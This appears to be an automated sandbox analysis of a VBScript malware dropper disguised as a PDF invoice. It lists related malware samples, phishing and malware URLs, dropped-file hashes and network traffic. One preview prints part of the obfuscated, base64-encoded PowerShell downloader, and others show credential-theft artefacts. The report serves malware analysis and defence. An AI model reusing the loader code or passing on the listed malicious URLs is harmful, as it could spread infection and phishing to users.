| | disktop.pif.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 13.107.139.11 |
| | https://1drv.ms/o/s!AhT23e1MofOfpnjbpE9m51fOcII5?e=K3DPPG | malicious | HtmlDropper, HTMLPhisher | 13.107.137.11 |
| | Oeyrmdo.exe | malicious | AgentTesla, PureLog Stealer | 13.107.137.11 |
| | Oeyrmdo.exe | malicious | AgentTesla, PureLog Stealer | 13.107.137.11 |
| | Payment Remittance Advice_000000202213.xlsb | malicious | Unknown | 13.107.137.11 |
| | z15ORDERBR2024-B001054840.vbs | malicious | Unknown | 13.107.139.11 |
| bg.microsoft.map.fastly.net | order & specification.vbs | malicious | AgentTesla, GuLoader | 199.232.210.172 |
| | SHIPPING DOCUMENTS_PDF..vbs | malicious | AgentTesla, GuLoader | 199.232.214.172 |
| | DHL Receipt_pdf.vbs | malicious | AgentTesla | 199.232.214.172 |
| | PO_La-Tanerie04180240124.vbs | malicious | FormBook, GuLoader | 199.232.214.172 |
| | https://msteams.link/WK80 | malicious | Phisher | 199.232.214.172 |
| | https://watsonpropertyllc.formstack.com/forms/staff | malicious | Unknown | 199.232.214.172 |
| | http://www.traininng.com | malicious | Unknown | 199.232.214.172 |
| | https://cionfacttalleriproj.norwayeast.cloudapp.azure.com?finanzas.busqueda?q=Secretar%C3%ADa+de+Administraci%C3%B3n+y+Finanzas?30337974_3097_705331937556-157889157889770732479410588494105884 | malicious | HTMLPhisher | 199.232.214.172 |
| | SecuriteInfo.com.Win64.Trojan.Agent.ASGXPI.7352.29283.exe | malicious | Unknown | 199.232.210.172 |
| | http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQ | malicious | HTMLPhisher | 199.232.210.172 |
| uploaddeimagens.com.br | F723838674.vbs | malicious | Remcos | 104.21.45.138 |
| | DHL Receipt_pdf.vbs | malicious | AgentTesla | 104.21.45.138 |
| | Remittance slip.vbs | malicious | Unknown | 104.21.45.138 |
| | SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtf | malicious | Remcos | 104.21.45.138 |
| | F873635427.vbs | malicious | Remcos, XWorm | 104.21.45.138 |
| | F873635427.vbs | malicious | Remcos, XWorm | 104.21.45.138 |
| | Payment Advice for Invoice 2024 0904.vbs | malicious | FormBook | 172.67.215.45 |
| | Price Quotation_pdf.vbs | malicious | AgentTesla | 104.21.45.138 |
| | 5FU4LRpQdy.rtf | malicious | Remcos | 104.21.45.138 |
| | yDOZ8nTvm8.rtf | malicious | AgentTesla | 104.21.45.138 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| CLOUDFLARENETUS | F723838674.vbs | malicious | Remcos | 104.21.84.67 |
| | order & specification.vbs | malicious | AgentTesla, GuLoader | 104.26.13.205 |
| | CTM REQUEST BIRTHSHIP.doc | malicious | AgentTesla | 172.67.175.222 |
| | SHIPPING DOCUMENTS_PDF..vbs | malicious | AgentTesla, GuLoader | 104.26.13.205 |
| | DHL Receipt_pdf.vbs | malicious | AgentTesla | 104.21.84.67 |
| | PO_La-Tanerie04180240124.vbs | malicious | FormBook, GuLoader | 104.21.74.5 |
| | Remittance slip.vbs | malicious | Unknown | 104.21.84.67 |
| | https://msteams.link/WK80 | malicious | Phisher | 104.21.80.104 |
| | https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | HTMLPhisher | 104.21.95.175 |
| | Cheater Pro 1.6.0.msi | malicious | Unknown | 104.20.3.235 |
| VNPT-AS-VNVNPTCorpVN | vlxx.arm7-20240418-1854.elf | malicious | Mirai, Okiru | 14.225.219.227 |
| | vlxx.x86-20240418-1853.elf | malicious | Mirai, Okiru | 14.225.219.227 |
| | Vedtb2CYvY.elf | malicious | Mirai | 113.163.181.117 |
                                                                                                                                                                                                                                                                2x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                • 203.161.50.129
                                                                                                                                                                                                                                                                hYN45tzxwl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 113.181.0.185
                                                                                                                                                                                                                                                                MY69DoYgp5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 14.236.143.111
                                                                                                                                                                                                                                                                x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 222.252.74.206
                                                                                                                                                                                                                                                                Specifications_0123jpg.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                • 202.92.7.88
                                                                                                                                                                                                                                                                cx9Nvpe3Cs.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 14.166.94.254
                                                                                                                                                                                                                                                                16rBksY5gH.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 222.252.9.213
                                                                                                                                                                                                                                                                CLOUDFLARENETUSF723838674.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                                                CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 172.67.175.222
                                                                                                                                                                                                                                                                SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                                                DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 104.21.74.5
                                                                                                                                                                                                                                                                Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                https://msteams.link/WK80Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                • 104.21.80.104
                                                                                                                                                                                                                                                                https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 104.21.95.175
                                                                                                                                                                                                                                                                Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUShttps://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 52.96.165.34
                                                                                                                                                                                                                                                                https://watsonpropertyllc.formstack.com/forms/staffGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.107.246.40
                                                                                                                                                                                                                                                                https://znixulyp.com/vGgw6oGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 13.107.213.40
                                                                                                                                                                                                                                                                https://huntingtonoakmont-my.sharepoint.com/:b:/g/personal/cmariotti_oakmontcommunities_com/EeUv57weU1BKhs36H3rF_G0BHM4kTzJShI_ZPwFvp1P7-g?e=4UASJ5Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 52.107.247.70
                                                                                                                                                                                                                                                                http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 52.96.173.162
                                                                                                                                                                                                                                                                https://t.airgears.org/r/?resource=120958450/4d9ac80/2a1170&e=dYRtX3NhcXBhbXduQUFjYW4kb26DYXK0LWQzJnV0bW9zb3WyY3V9YWNkJnV1bV9uAWRpdZ09ZW1ibWwmd39udW09OUT3MTNwMzQzMUYmd391cj0zJm1pX4U9eW5kZWApbmVlJmNpZD2yYURNNzV0NDgmYnlkPUE2MjBzN&ref_=1wy&ref=98k/&u=4jj4/&eid=xekc6v/DU5MjEnc2VoY29lZT11cmRlZnluZWQ&s=obI3r-q7de3Me3nnN3cpKfiix7CULJmXF7FuunFtjSxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.107.246.41
                                                                                                                                                                                                                                                                https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499faGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 20.90.131.0
                                                                                                                                                                                                                                                                notepad.txtGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 52.96.189.2
                                                                                                                                                                                                                                                                https://u2355257.ct.sendgrid.net/ls/click?upn=u001.4YkCuNYTF3S1epm9KijHzHFfZe6RGn3F0umQQjG6fIb5h6U0n3Lap6J1hKqXi7Fiss-2Fnjz-2BcFRXpypvRmmfgWqO0slZGlTTOeSsAA0pI8tdrm-2F1TCZGVrUbz-2Fug83KSKfjVn_Ft8eY2PHa1awfrORAsIR9w84lhfuPmqFjQmDsVAH8hyK2jxcX4jAHKq6a8hoGITMOqGD3YxOAS6UCxAb-2BxR3uPyYHHRtPZbwpb00CqcBOzR0Iu2K8fB1VT-2Bkwb9kHAJPdhdLZAJG1dWDxv-2F3y0btEt8yJNPNzau03REICjJd-2BfU8x2dosq7VBZS-2BuuDa4hO6i8I2R8aw54LzuuGTyfjItw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 13.107.213.41
                                                                                                                                                                                                                                                                rapport.docx_POH.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.107.246.51
                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (11695), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13769
                                                                                                                                                                                                                                                                Entropy (8bit):4.724051688607516
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:Q9on1dVIsJfJvpDIkPAd+mUaGPCi3rLR+H+W+REzVpPgRhVN5bj4uLOwPG:VVVZtpDnAgvaGKi3rLRNFuVmP9OP
                                                                                                                                                                                                                                                                MD5:4CFA8B0F2BC26FF23C6C5FCEA830C95B
                                                                                                                                                                                                                                                                SHA1:40F7A9E809B95D4C49EA385534A8731892634EDA
                                                                                                                                                                                                                                                                SHA-256:D8528A06750DA01A8AB54115DDACFE893CC8C0416994D08B6003482610E8649D
                                                                                                                                                                                                                                                                SHA-512:4C0770774C7EFB978CC1DD01A0D019218ABFBCE4FC270AF2F34685E5705872250C7532EDF040E851EE21028588E648E60C1A9B0A5A619CE50F3C4FC2097ECED5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:.. dim ovarista , caleceiro , tangendo , ladrilho , trapalhona , Cama , trapalhona1.. caleceiro = " ".. tangendo = "" & ladrilho & caleceiro & ladrilho & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & ladrilho & caleceiro & ladrilho & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & ladrilho & caleceiro & ladrilho & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & ladrilho & caleceiro & ladrilho & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & ladrilho & caleceiro & ladrilho & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & ladrilho & caleceiro & ladrilho & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & ladrilho &
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Nlllulp77th:NllU
                                                                                                                                                                                                                                                                MD5:7B5F360646F3167812DC4ADF7B166512
                                                                                                                                                                                                                                                                SHA1:F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
                                                                                                                                                                                                                                                                SHA-256:672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
                                                                                                                                                                                                                                                                SHA-512:7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:@...e.................................x..............@..........
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):98686
                                                                                                                                                                                                                                                                Entropy (8bit):7.882370001248752
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:WO/iXVZd4WAFyMJWvoLC7W5wmIfXrhS9tWCZ9kj0doO7:WHVZrXxvCC/vsT6j0Z7
                                                                                                                                                                                                                                                                MD5:9E6078B7B88AC3677069340D0F4509DC
                                                                                                                                                                                                                                                                SHA1:356D6F3A803DB4FF7D5295BDE2AD1289E97FD504
                                                                                                                                                                                                                                                                SHA-256:1A9E81EBF9582309AE4D36FFB77473160FE2E2B15EFA196724BDFFA5D5BC5B77
                                                                                                                                                                                                                                                                SHA-512:5611E4067667410961970700703C39D7777797D521898801ED6FFB55CD5AF85DFFE25CACED699CD0FABFF8DD1CC7C7C6198084B9F3802BFB434B1E90A8E76629
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                                                                                                File Type:Targa image data - RGB - RLE 109 x 101 x 32 +114 +111 "R"
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):38
                                                                                                                                                                                                                                                                Entropy (8bit):2.7883088224543333
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:rFGQJhIl:RGQPY
                                                                                                                                                                                                                                                                MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                                                                                                                                                                                                                                                SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                                                                                                                                                                                                                                                SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                                                                                                                                                                                                                                                SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):2.8420918598895937
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                                                                                                                                                                                                                                MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                                                                                                                                                                                                                                SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                                                                                                                                                                                                                                SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                                                                                                                                                                                                                                SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):2.96096404744368
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:AJlbeGQJhIl:tGQPY
                                                                                                                                                                                                                                                                MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
                                                                                                                                                                                                                                                                SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
                                                                                                                                                                                                                                                                SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
                                                                                                                                                                                                                                                                SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....
                                                                                                                                                                                                                                                                File type:Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
                                                                                                                                                                                                                                                                Entropy (8bit):3.7148302585363684
                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                                                                                                                                                                                                • MP3 audio (1001/1) 32.22%
                                                                                                                                                                                                                                                                • Lumena CEL bitmap (63/63) 2.03%
                                                                                                                                                                                                                                                                • Corel Photo Paint (41/41) 1.32%
                                                                                                                                                                                                                                                                File name:Signed Proforma Invoice 3645479_pdf.vbs
                                                                                                                                                                                                                                                                File size:114'700 bytes
                                                                                                                                                                                                                                                                MD5:9e049f3029a5a6df1ab5d77d1a934ce3
                                                                                                                                                                                                                                                                SHA1:a31e0f94e0ee4dba78bc8adc291e1035d48561bd
                                                                                                                                                                                                                                                                SHA256:0831fee0915f056e6ca78e9a83a2fe75260a197c0d64e7a200ab8ebfc3479536
                                                                                                                                                                                                                                                                SHA512:de4fc68e686362318b5a77308a5b69fb43745b288f4043baf5929a12ea1d4b33fd9336472a13c010808c5feb75f519f2e5c3244374d9777f32d9f06d69abd4b7
                                                                                                                                                                                                                                                                SSDEEP:1536:Hxhb3QosU1lBHFcJUJI+YZb5bJ9Gmgz/+rtfRDFqGb5uJZUU0tKl9CP8Z:HjQNU1DHFUGmgURDFBe0tKl9CP4
                                                                                                                                                                                                                                                                TLSH:AEB3BB5267FA1208F5F7AB48A97611340B37BDA9AD7DC64C05CC290D0FF3A848865BB7
                                                                                                                                                                                                                                                                File Content Preview:......'.....c.o.n.s.t. .l.a.r.g.a.t.a. . . . . . . . . . .=. .0.....c.o.n.s.t. .k.A.c.t.i.o.n.D.e.l.e.t.e. . . . . . . .=. .1.....c.o.n.s.t. .k.A.c.t.i.o.n.L.i.s.t. . . . . . . . . .=. .2.....c.o.n.s.t. .e.s.m.e.t.i.a.r. . . . . . .=. .3.....c.o.n.s.t. .p
                                                                                                                                                                                                                                                                Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093688965 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.104835033 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.104859114 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.900516987 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.900577068 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.900671005 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.910021067 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.910047054 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.138297081 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.138386011 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.141815901 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.141827106 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.142187119 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.149214029 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.192121029 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422663927 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422713995 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422760010 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422786951 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422934055 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422971964 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422979116 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423008919 CEST44349731104.21.45.138192.168.2.4
